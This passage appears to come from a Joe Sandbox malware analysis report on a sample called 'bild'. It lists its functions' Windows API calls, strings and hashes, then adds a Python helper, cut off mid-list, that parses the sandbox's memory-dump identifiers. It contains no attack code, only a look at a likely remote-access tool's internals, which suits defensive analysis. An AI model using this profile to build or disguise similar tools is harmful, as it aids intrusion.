                                                                                      • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                    • CreateDirectoryA.KERNEL32(11144D48,00000000,?,?,?,11144D48,00000000), ref: 111446E7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
                                                                                    • String ID:
                                                                                    • API String ID: 398584587-0
                                                                                    • Opcode ID: 1d6e66add7aa45a35b25948c47e98be79544d5c3af84ae5a96c3b7650b6c772d
                                                                                    • Instruction ID: 9245e394badc27c9d68c775c1ae1103ae8f1f8453310ecf51c29309078bed6c3
                                                                                    • Opcode Fuzzy Hash: 1d6e66add7aa45a35b25948c47e98be79544d5c3af84ae5a96c3b7650b6c772d
                                                                                    • Instruction Fuzzy Hash: F4016D7A7441065BF301197D7C057ABBB8C8F82AADF144032F89DC3D80F752E41682A1
                                                                                    APIs
                                                                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 1100EDA2
                                                                                      • Part of subcall function 11160824: _setlocale.LIBCMT ref: 11160836
                                                                                    • _free.LIBCMT ref: 1100EDB4
                                                                                      • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                      • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                    • _free.LIBCMT ref: 1100EDC7
                                                                                    • _free.LIBCMT ref: 1100EDDA
                                                                                    • _free.LIBCMT ref: 1100EDED
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                                                                    • String ID:
                                                                                    • API String ID: 3515823920-0
                                                                                    • Opcode ID: e9cccfb890659d646b87ebb6d02808fc30e7ad32e75d4fdbd2f602c0bae7d034
                                                                                    • Instruction ID: 71b49ece8787e94f553dd036e4ff5c8d0ec16ff98238e97fea1187b5179b4c62
                                                                                    • Opcode Fuzzy Hash: e9cccfb890659d646b87ebb6d02808fc30e7ad32e75d4fdbd2f602c0bae7d034
                                                                                    • Instruction Fuzzy Hash: E61190B1D046109BD620DF599C40A5BF7FCEB44754F144A2AE456D3780E672F900CB91
                                                                                    APIs
                                                                                      • Part of subcall function 11144BD0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11194AB8), ref: 11144C3D
                                                                                      • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110F4CB), ref: 11144C7E
                                                                                      • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 11144CDB
                                                                                    • wsprintfA.USER32 ref: 1114593E
                                                                                    • wsprintfA.USER32 ref: 11145954
                                                                                      • Part of subcall function 11143230: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110F4CB,75BF8400,?), ref: 111432C7
                                                                                      • Part of subcall function 11143230: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 111432E7
                                                                                      • Part of subcall function 11143230: CloseHandle.KERNEL32(00000000), ref: 111432EF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$CreateFolderPathwsprintf$CloseHandleModuleName
                                                                                    • String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
                                                                                    • API String ID: 3779116287-2600120591
                                                                                    • Opcode ID: 67484a9d389779804940ba9c5ec62be4ee321b08fc9342a56252b28d4b9918b0
                                                                                    • Instruction ID: 1f9a4f0ce9ce2038842d239495dc50e58c380b2d1dc072d0c6c391bd72002940
                                                                                    • Opcode Fuzzy Hash: 67484a9d389779804940ba9c5ec62be4ee321b08fc9342a56252b28d4b9918b0
                                                                                    • Instruction Fuzzy Hash: 9C01B1B990521D66CB109BB0AC41FEAF77C9B1470DF100199EC1996940EE21BA548BA4
                                                                                    APIs
                                                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110F4CB,75BF8400,?), ref: 111432C7
                                                                                    • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 111432E7
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 111432EF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
• Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: CreateFile$CloseHandle
• String ID: "
• API String ID: 1443461169-123907689
• Opcode ID: 6335c3239e743a75aad2b4d26ce3924e96bfc614049b49f4e6d7105e566d10f2
• Instruction ID: 150de81b6b92e27c68bcdd2e608667d56283c35638c5ea37a79585d4ca6bceb2
• Opcode Fuzzy Hash: 6335c3239e743a75aad2b4d26ce3924e96bfc614049b49f4e6d7105e566d10f2
• Instruction Fuzzy Hash: 38217C30A1C269AFE3128E78DD54FD9BBA49F45B14F3041E0E4999B1C1DBB1A948C750
APIs
  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
• SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,420B7E12,74DF2EE0,?,00000000,1118083B,000000FF,?,110300D6,UseIPC,00000001,00000000), ref: 1102D187
  • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
  • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
  • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
  • Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 1102D14A
Strings
Memory Dump Source
• Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: Event$Create$__wcstoi64_malloc_memsetwsprintf
• String ID: Client$DisableGeolocation
• API String ID: 3315423714-4166767992
• Opcode ID: a2dd62344aa7ed2eba45e03fd0b01f9a1bb13e0d2f8602a6c4817aeae004d655
• Instruction ID: 1755caac6fc2658334c1ed2ebc8622a08952aff54e10c128aab6c20125b970ec
• Opcode Fuzzy Hash: a2dd62344aa7ed2eba45e03fd0b01f9a1bb13e0d2f8602a6c4817aeae004d655
• Instruction Fuzzy Hash: 8521E474A40315BBE712CFA8CD42B6EF7A4E708B18F500269F921AB3C0D7B5B8008785
APIs
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110271DA
  • Part of subcall function 110CD550: EnterCriticalSection.KERNEL32(00000000,00000000,75BF3760,00000000,75C0A1D0,1105DCBB,?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD56B
  • Part of subcall function 110CD550: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD598
  • Part of subcall function 110CD550: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD5AA
  • Part of subcall function 110CD550: LeaveCriticalSection.KERNEL32(?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD5B4
• TranslateMessage.USER32(?), ref: 110271F0
• DispatchMessageA.USER32(?), ref: 110271F6
Strings
Memory Dump Source
• Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
• String ID: Exit Msgloop, quit=%d
• API String ID: 3212272093-2210386016
• Opcode ID: 4c35fe21e6f1fdccfd242282fb0e51879004b37df93db9ac228ac0a7d4dc8e25
• Instruction ID: 083e85bce0718499e1b375aadfda5de5654481b636091be3423b85693ac47093
• Opcode Fuzzy Hash: 4c35fe21e6f1fdccfd242282fb0e51879004b37df93db9ac228ac0a7d4dc8e25
• Instruction Fuzzy Hash: 3D01D876E0521D66EB15DAE99C82F6FF3BD6B64718FD00065EE1092185F760F404CBA1
APIs
• GetTickCount.KERNEL32 ref: 110173FD
  • Part of subcall function 11017300: WaitForSingleObject.KERNEL32(0000031C,000000FF), ref: 1101733C
  • Part of subcall function 11017300: CoInitialize.OLE32(00000000), ref: 11017345
  • Part of subcall function 11017300: _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101736C
  • Part of subcall function 11017300: CoUninitialize.COMBASE ref: 110173D0
  • Part of subcall function 11017220: WaitForSingleObject.KERNEL32(0000031C,000000FF), ref: 11017252
  • Part of subcall function 11017220: CoInitialize.OLE32(00000000), ref: 1101725B
  • Part of subcall function 11017220: _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017282
  • Part of subcall function 11017220: CoUninitialize.COMBASE ref: 110172E0
• SetEvent.KERNEL32(0000031C), ref: 1101741D
• GetTickCount.KERNEL32 ref: 11017423
Strings
• touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 1101742D
Memory Dump Source
• Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: CountInitializeObjectSingleStringTickUninitializeW@16Wait$Event
• String ID: touchkbd, systype=%d, chassis=%d, took %d ms
• API String ID: 3804766296-4122679463
• Opcode ID: 66f2a400a49d4a3db1117531ae3dbc6183e4453ddcab9e324682772d92ed33ab
• Instruction ID: c54e938b4ab1921e6220328725fe5e45cb955b1045b44cf9de438437e8313787
• Opcode Fuzzy Hash: 66f2a400a49d4a3db1117531ae3dbc6183e4453ddcab9e324682772d92ed33ab
• Instruction Fuzzy Hash: 47F0A0B6E1011C6BE700DBF9AC8AE6BBB9CDB4471CB100026F910C7245E9A6BC1087A1
APIs
  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
• CreateThread.KERNEL32(00000000,00001000,Function_00137630,00000000,00000000,11138782), ref: 1113782E
• CloseHandle.KERNEL32(00000000,?,11138782,AutoICFConfig,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11137835
Strings
Memory Dump Source
• Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: CloseCreateHandleThread__wcstoi64
• String ID: *AutoICFConfig$Client
• API String ID: 3257255551-59951473
• Opcode ID: 58a92f72c8c5fc2ca777e547e4c7fef86ef2c1d8c64fc3a44eb11c2425719861
• Instruction ID: 9aee7181833ba8711af7cecc10eced9f2f0784297ad8accf53734ae3fbf9e9e1
• Opcode Fuzzy Hash: 58a92f72c8c5fc2ca777e547e4c7fef86ef2c1d8c64fc3a44eb11c2425719861
• Instruction Fuzzy Hash: 98E0D8757A062D7AF6149AE98C86F65F6199744B26F500154FA20A50C4D6A0A440CB64
APIs
• Sleep.KERNEL32(000000FA), ref: 11070CB7
• EnterCriticalSection.KERNEL32(?), ref: 11070CC4
• LeaveCriticalSection.KERNEL32(?), ref: 11070D96
Strings
Memory Dump Source
• Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: CriticalSection$EnterLeaveSleep
• String ID: Push
• API String ID: 1566154052-4278761818
• Opcode ID: a72291858ce6dc6b0c64ae6c986eadc989c908336576dbf916d062231e355c4c
• Instruction ID: e8f6e055aac827a13dfabc2dec6ad808bd843e21556e42594c7620890779e76f
• Opcode Fuzzy Hash: a72291858ce6dc6b0c64ae6c986eadc989c908336576dbf916d062231e355c4c
• Instruction Fuzzy Hash: 1B51CC78E04784DFE721DF64C880B8AFBE0EF09318F1546A9D8998B285D770BC84CB91
APIs
• GetCommandLineA.KERNEL32 ref: 002D1027
• GetStartupInfoA.KERNEL32(?), ref: 002D107B
• GetModuleHandleA.KERNEL32(00000000,00000000,00000000,?), ref: 002D1096
• ExitProcess.KERNEL32 ref: 002D10A3
Memory Dump Source
• Source File: 00000004.00000002.4157770634.00000000002D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002D0000, based on PE: true
• Associated: 00000004.00000002.4157702071.00000000002D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.4157805406.00000000002D2000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2d0000_bild.jbxd
Yara matches
Similarity
• API ID: CommandExitHandleInfoLineModuleProcessStartup
• String ID:
• API String ID: 2164999147-0
• Opcode ID: 6af17bb54ccc186710673de5a1aad54bd8ed6a6b9ac8d0211afecfaff4581e06
• Instruction ID: 91f5960a4a91ce1561f3094c7f764e53779f42b32541424a9175aadfd4a41f93
• Opcode Fuzzy Hash: 6af17bb54ccc186710673de5a1aad54bd8ed6a6b9ac8d0211afecfaff4581e06
• Instruction Fuzzy Hash: E01108208143C6BAFB31BFA085487EABF955F22383F240046DDD596746C2524CF7C760
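Every function record above points at a memory-dump identifier of the form PID.stage.id.address.protection.flags.type.module.sdmp, and the report lists the same set of "Associated" dumps for each function of a module. The following helper, added here and not part of the Joe Sandbox report or of any Joe Sandbox tooling, splits those identifiers into their fields so an analyst can tell which dump holds the PE header (the "Offset" the report uses as image base), which holds executable code, and which belong to the same module. The field meanings are inferred from the values on this page, not from vendor documentation: the fourth field matches the reported base addresses, the fifth field takes the values 0x02, 0x04 and 0x20 exactly where a PE header, a data section and a code section would carry PAGE_READONLY, PAGE_READWRITE and PAGE_EXECUTE_READ, and the seventh field is always 0x01000000, the value of the Windows MEM_IMAGE constant; the last field (0x09 for the submitted executable at 0x2D0000, 0x0A for the module at 0x11000000) is treated as a module index. The sample identifiers are copied from this report's "Memory Dump Source" lines.

```python
import re
from dataclasses import dataclass

# Windows page-protection constants from winnt.h. That Joe Sandbox stores the
# region protection in the fifth field is an inference from this report's
# values (0x20 code section, 0x02 PE header, 0x04 data), not documented fact.
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_IMAGE = 0x01000000  # winnt.h; equals the seventh field of every identifier here

# Assumed layout: pid.stage.dump_id.base.protect.flags.mem_type.module.sdmp
SDMP_RE = re.compile(
    r"^(?P<pid>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<flags>[0-9A-Fa-f]{8})\."
    r"(?P<memtype>[0-9A-Fa-f]{8})\.(?P<module>[0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    pid: int
    stage: int
    base: int
    protect: int
    mem_type: int
    module: int

    @property
    def executable(self) -> bool:
        # Any of the PAGE_EXECUTE* bits (0x10..0x80) marks the region as code.
        return self.protect & 0xF0 != 0

    @property
    def protection_name(self) -> str:
        return PAGE_PROTECTION.get(self.protect, f"0x{self.protect:02x}")


def parse_sdmp(name: str) -> DumpRegion:
    """Split one .sdmp identifier into its numeric fields (all hex except dump_id)."""
    m = SDMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a Joe Sandbox dump identifier: {name!r}")
    return DumpRegion(
        pid=int(m["pid"], 16),
        stage=int(m["stage"], 16),
        base=int(m["base"], 16),
        protect=int(m["protect"], 16),
        mem_type=int(m["memtype"], 16),
        module=int(m["module"], 16),
    )


def group_by_module(names):
    """Map module index -> regions of that module, sorted by base address."""
    groups = {}
    for n in names:
        r = parse_sdmp(n)
        groups.setdefault(r.module, []).append(r)
    for regs in groups.values():
        regs.sort(key=lambda r: r.base)
    return groups


def image_base(regions):
    """Lowest-addressed region of a module: the PE header, i.e. the image base
    to use when loading the dump into a disassembler (the report's 'Offset')."""
    return min(r.base for r in regions)


def code_regions(regions):
    """Regions whose protection carries an execute bit; the ones worth disassembling."""
    return [r for r in regions if r.executable]


# Constructed input: identifiers copied from this report's 'Memory Dump Source' lines.
SAMPLE_DUMPS = [
    "00000004.00000002.4157702071.00000000002D0000.00000002.00000001.01000000.00000009.sdmp",
    "00000004.00000002.4157770634.00000000002D1000.00000020.00000001.01000000.00000009.sdmp",
    "00000004.00000002.4157805406.00000000002D2000.00000002.00000001.01000000.00000009.sdmp",
    "00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp",
    "00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp",
    "00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp",
    "00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp",
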